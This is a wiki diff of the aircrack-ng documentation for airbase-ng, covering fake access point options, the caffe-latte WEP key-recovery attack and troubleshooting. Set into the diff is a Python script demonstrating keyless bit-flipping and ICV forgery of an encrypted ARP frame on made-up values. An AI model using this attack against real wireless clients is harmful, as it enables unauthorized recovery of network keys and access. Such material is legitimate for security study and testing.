airbase-ng [2010/03/07 23:36] – Fixed typo darkaudax | airbase-ng [2018/03/11 18:54] (current) – Updated link to issue mister_x |
==== -q Quiet Flag ==== | ==== -q Quiet Flag ==== |
| |
This surpresses printing any statistics or status information. | This suppresses printing any statistics or status information. |
| |
==== -v Verbose Flag ==== | ==== -v Verbose Flag ==== |
==== -s Force Shared Key Authentication ==== | ==== -s Force Shared Key Authentication ==== |
| |
When specfiied, this forces shared key authentication for all clients. | When specified, this forces shared key authentication for all clients. |
| |
The soft AP will send an "authentication method unsupported" rejection to any open system | The soft AP will send an "authentication method unsupported" rejection to any open system |
==== -L Caffe Latte Attack ==== | ==== -L Caffe Latte Attack ==== |
| |
Airbase-ng also contains the new caffe-latte attack, which is also implemented in aireplay-ng as attack "-6". It can be used with "-L" or "--caffe-latte". This attack specifically works against clients, as it waits for a broadcast arp request, which happens to be a gratuitous arp. See [[http://wiki.wireshark.org/Gratuitous_ARP|this]] for an explaination of what a [[http://wiki.wireshark.org/Gratuitous_ARP|gratuitous arp]] is. It then flips a few bits in the sender MAC and IP, corrects the ICV (crc32) value and sends it back to the client, where it came from. The point why this attack works in practice is, that at least windows sends gratuitous arps after a connection on layer 2 is established and a static ip is set, or dhcp fails and windows assigned an IP out of 169.254.X.X. | Airbase-ng also contains the new caffe-latte attack, which is also implemented in aireplay-ng as attack "-6". It can be used with "-L" or "--caffe-latte". This attack specifically works against clients, as it waits for a broadcast arp request, which happens to be a gratuitous arp. See [[http://wiki.wireshark.org/Gratuitous_ARP|this]] for an explanation of what a [[http://wiki.wireshark.org/Gratuitous_ARP|gratuitous arp]] is. It then flips a few bits in the sender MAC and IP, corrects the ICV (crc32) value and sends it back to the client, where it came from. The point why this attack works in practice is, that at least windows sends gratuitous arps after a connection on layer 2 is established and a static ip is set, or dhcp fails and windows assigned an IP out of 169.254.X.X. |
| |
"-x <pps>" sets the number of packets per second to send when performing the caffe-latte attack. At the moment, this attack doesn't stop, it continuously sends arp requests. Airodump-ng is needed to capture the replys. | "-x <pps>" sets the number of packets per second to send when performing the caffe-latte attack. At the moment, this attack doesn't stop, it continuously sends arp requests. Airodump-ng is needed to capture the replys. |
| |
==== -y Disable Broadcast Probes ==== | ==== -y Disable Broadcast Probes ==== |
When using this option, the fake AP will not respond to broadcast probes. A broadcast probe is where the the specific AP is not identified uniquely. Typically, most APs will respond with probe responses to a broadcast probe. This flag will prevent this happening. It will only respond when the specific AP is uniquely requested. | When using this option, the fake AP will not respond to broadcast probes. A broadcast probe is where the specific AP is not identified uniquely. Typically, most APs will respond with probe responses to a broadcast probe. This flag will prevent this happening. It will only respond when the specific AP is uniquely requested. |
| |
==== -0 Set WPA/WEP Tags ==== | ==== -0 Set WPA/WEP Tags ==== |
* -d 00:06:62:F8:1E:2C filters the data captured to fake AP MAC (this is optional) | * -d 00:06:62:F8:1E:2C filters the data captured to fake AP MAC (this is optional) |
* -w specifies the file name prefix of the captured data | * -w specifies the file name prefix of the captured data |
* ath0 specifies the wireless interface to capture data on | * wlan0 specifies the wireless interface to capture data on |
| |
Here is what the window looks like when airbase-ng has received a packet from the client and has successfully started the attack: | Here is what the window looks like when airbase-ng has received a packet from the client and has successfully started the attack: |
==== Caffe Latte Attack in Access Point mode ==== | ==== Caffe Latte Attack in Access Point mode ==== |
| |
This attack obtains the WEP key from a client. It depends on receiving at least one gratutitous ARP request from the client after it has associated with the fake AP. | This attack obtains the WEP key from a client. It depends on receiving at least one gratuitous ARP request from the client after it has associated with the fake AP. |
| |
Enter: | Enter: |
| |
* -c 9 specifies the channel | * -c 9 specifies the channel |
* -d 00:C0:C6:94:F4:87 filters the data captured to fake AP MAC. It is MAC of card running the the fake AP. This is optional. | * -d 00:C0:C6:94:F4:87 filters the data captured to fake AP MAC. It is MAC of card running the fake AP. This is optional. |
* -w specifies the file name of the captured data | * -w specifies the file name of the captured data |
* wlan0 specifies the wireless interface to capture data on | * wlan0 specifies the wireless interface to capture data on |
| |
When the client connects, notice the "WPA handshake: 00:C0:C6:94:F4:87" in the top right-hand corner of the screen below: | When the client connects, notice the "WPA handshake: 00:C0:C6:94:F4:87" in the top right-hand corner of the screen below: |
| |
CH 9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87 | CH 9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87 |
| |
| |
In all cases, bit flipping is used to ensure the CRC is correct. Additionally, bit flipping is used to ensure the source MAC of the ARP contained within the fragmented packet is not multicast. | In all cases, bit flipping is used to ensure the CRC is correct. Additionally, bit flipping is used to ensure the source MAC of the ARP contained within the fragmented packet is not multicast. |
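The caffe-latte description above and the note on bit flipping in this section both rest on one property: WEP's ICV is a plain CRC-32, which is affine, so an attacker who XORs a difference into the encrypted ARP payload can patch the encrypted ICV by a value that depends only on that difference, without the key. The following Python is an added example written for this page, not aircrack-ng or airbase-ng code. It constructs a gratuitous ARP request, WEP-protects it with a made-up 40-bit key and IV (the client side), then on the attacker side flips bits in the sender MAC and sender IP of the ciphertext, corrects the ICV, checks that the new sender MAC has not become a multicast address (I/G bit), and shows that the client decrypts the forged frame with a valid ICV while the same flips without the correction fail. The MAC, IP, key and IV values, the `SHA_OFF`/`SPA_OFF` offsets and all function names are assumptions of this example, not values from the page.

```python
import struct
import zlib

# Added example (not aircrack-ng code): a constructed WEP-protected gratuitous
# ARP request, the bit flips the caffe-latte attack applies to its sender
# MAC/IP, and the ICV (CRC-32) correction that keeps the forged frame valid
# without knowing the WEP key. Key, IV, MAC and IP values are made up.
CLIENT_MAC = bytes.fromhex("00c0c694f487")  # visible in the clear 802.11 header
CLIENT_IP = bytes([169, 254, 10, 20])       # APIPA address; attacker need not know it
WEP_KEY = bytes.fromhex("0102030405")       # 40-bit key known only to the client
IV = b"\x01\x02\x03"                        # WEP IV, sent in the clear and reused as-is
SHA_OFF, SPA_OFF = 16, 22                   # sender MAC / sender IP offsets in the payload


def build_gratuitous_arp(sender_mac, sender_ip):
    """LLC/SNAP header + ARP request whose target IP equals the sender IP."""
    llc_snap = bytes.fromhex("aaaa030000000806")
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      sender_mac, sender_ip, bytes(6), sender_ip)
    return llc_snap + arp


def rc4(key, length):
    """Plain RC4 keystream generator (WEP uses RC4 with key = IV || WEP key)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv, key, data):
    """Client side: append little-endian CRC-32 ICV, then RC4-encrypt data||ICV."""
    icv = struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)
    return xor(data + icv, rc4(iv + key, len(data) + 4))


def wep_decrypt(iv, key, ciphertext):
    """Client side: decrypt and report whether the ICV matches."""
    body = xor(ciphertext, rc4(iv + key, len(ciphertext)))
    data, icv = body[:-4], body[-4:]
    return data, struct.unpack("<I", icv)[0] == (zlib.crc32(data) & 0xFFFFFFFF)


def is_multicast_mac(mac):
    """I/G bit: least significant bit of the first octet set means group address."""
    return bool(mac[0] & 1)


def icv_correction(diff):
    """CRC-32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros(len(d))).
    So the ICV change for XORing `diff` into the plaintext depends only on diff."""
    return (zlib.crc32(diff) ^ zlib.crc32(bytes(len(diff)))) & 0xFFFFFFFF


def forge_reflected_arp(ciphertext, client_mac, new_sender_mac, ip_xor_mask, fix_icv=True):
    """Attacker side: flip sender MAC/IP bits inside the encrypted frame and
    patch the encrypted ICV so the client still accepts it. No key needed."""
    if is_multicast_mac(new_sender_mac):
        raise ValueError("sender MAC would become multicast; flip the I/G bit back")
    diff = bytearray(len(ciphertext))
    diff[SHA_OFF:SHA_OFF + 6] = xor(client_mac, new_sender_mac)  # attacker knows old MAC
    diff[SPA_OFF:SPA_OFF + 4] = ip_xor_mask                      # old IP stays unknown
    if fix_icv:
        diff[-4:] = struct.pack("<I", icv_correction(bytes(diff[:-4])))
    return xor(ciphertext, diff)


def demo():
    """Client emits a gratuitous ARP; attacker reflects a modified copy of it."""
    captured = wep_encrypt(IV, WEP_KEY, build_gratuitous_arp(CLIENT_MAC, CLIENT_IP))
    new_mac = bytes.fromhex("00c0c694f486")      # one bit flipped, still unicast
    ip_mask = bytes([0, 0, 0, 1])                # flips last bit of the sender IP
    forged = forge_reflected_arp(captured, CLIENT_MAC, new_mac, ip_mask)
    naive = forge_reflected_arp(captured, CLIENT_MAC, new_mac, ip_mask, fix_icv=False)
    data, ok = wep_decrypt(IV, WEP_KEY, forged)
    _, naive_ok = wep_decrypt(IV, WEP_KEY, naive)
    return {
        "icv_ok": ok,                          # True: client will process the ARP
        "naive_icv_ok": naive_ok,              # False: flipped bits without ICV fix
        "sender_mac": data[SHA_OFF:SHA_OFF + 6].hex(),
        "sender_ip": ".".join(str(b) for b in data[SPA_OFF:SPA_OFF + 4]),
    }


if __name__ == "__main__":
    print(demo())
```

The attacker can compute the MAC difference exactly because the client's MAC is in the unencrypted 802.11 header; for the IP it only XORs a mask into the field, which is enough to make the reflected request look like it comes from another host so the client answers it. Each answer is a fresh WEP-encrypted frame with a new IV, which is the traffic airodump-ng collects for aircrack-ng.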
| |
| ==== SoftAP with Internet connection and MITM sniffing ==== |
| |
| This [[http://forum.aircrack-ng.org/index.php?topic=7172.0|forum thread]] provides a tutorial for SoftAP with Internet connection and MITM sniffing. |
| |
| |
===== Usage Troubleshooting ===== | ===== Usage Troubleshooting ===== |
==== Broken SKA error message ==== | ==== Broken SKA error message ==== |
| |
You receive "Broken SKA: <MAC address> (expected: ??, got ?? bytes)" or similar. When using the "-S" option with values different then 128, some clients fail. This message indicates the number of bytes actually received was different that the number requested. Either don't use the option or try different values of "-S" to see which one elminates the error. | You receive "Broken SKA: <MAC address> (expected: ??, got ?? bytes)" or similar. When using the "-S" option with values different then 128, some clients fail. This message indicates the number of bytes actually received was different that the number requested. Either don't use the option or try different values of "-S" to see which one eliminates the error. |
| |
==== "write failed: Message too long" / "wi_write(): Illegal seek" error messages ==== | ==== "write failed: Message too long" / "wi_write(): Illegal seek" error messages ==== |
| |
See this [[http://trac.aircrack-ng.org/ticket/469|trac ticket]] for a workaround. The trac ticket explains the root cause and how to adjust the MTU to avoid the problem. | See this [[https://github.com/aircrack-ng/aircrack-ng/issues/469|GitHub issue]] for a workaround. The issue explains the root cause and how to adjust the MTU to avoid the problem. |
| |
==== Error creating tap interface: Permission denied ==== | ==== Error creating tap interface: Permission denied ==== |